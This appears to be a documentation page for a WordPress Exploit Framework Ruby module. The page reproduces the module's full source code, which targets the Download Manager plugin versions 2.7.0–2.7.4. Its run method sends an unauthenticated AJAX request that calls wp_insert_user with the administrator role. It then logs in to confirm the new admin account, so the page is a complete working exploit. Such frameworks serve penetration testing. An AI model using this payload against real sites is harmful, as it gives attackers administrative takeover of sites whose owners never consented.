class Wpxf::Auxiliary::DownloadManagerPrivilegeEscalation
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb, line 9 def initialize super update_info( name: 'Download Manager Privilege Escalation', desc: 'The Download Manager plugin, in versions 2.7.0 to 2.7.4, '\ 'allows unauthenticated users to create new admin users '\ 'due to lack of validation wpdm_ajax_call_exec.', author: [ 'Mickael Nadeau', # Vulnerability discovery 'rastating' # WPXF module ], references: [ ['EDB', '35533'], ['WPVDB', '7706'] ], date: 'Dec 3 2014' ) register_options([ StringOption.new( name: 'username', desc: 'The username to register with', default: Utility::Text.rand_alpha(10) ), StringOption.new( name: 'password', desc: 'The password to register with', default: Utility::Text.rand_alpha(rand(10..20)) ) ]) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb, line 50 def check check_plugin_version_from_readme('download-manager', '2.7.5', '2.7.0') end
password()
click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb, line 46 def password normalized_option_value('password') end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb, line 58 def run return false unless super emit_info 'Creating new admin user...' res = execute_post_request( url: full_uri, body: { 'action' => 'wpdm_ajax_call', 'execute' => 'wp_insert_user', 'user_login' => username, 'user_pass' => password, 'role' => 'administrator' } ) emit_info "Response code: #{res.code}", true emit_info "Response body: #{res.body}", true emit_info 'Verifying new account...' if wordpress_login(username, password) emit_success "User #{username} with password #{password} successfully created" return true else emit_error 'Failed to create new user' return false end if res.nil? || res.timed_out? emit_error 'No response from the target' return false end return true end
uploads_url()
click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb, line 54 def uploads_url normalize_uri(wordpress_url_wp_content, 'uploads', 'download-manager-files') end
username()
click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb, line 42 def username normalized_option_value('username') end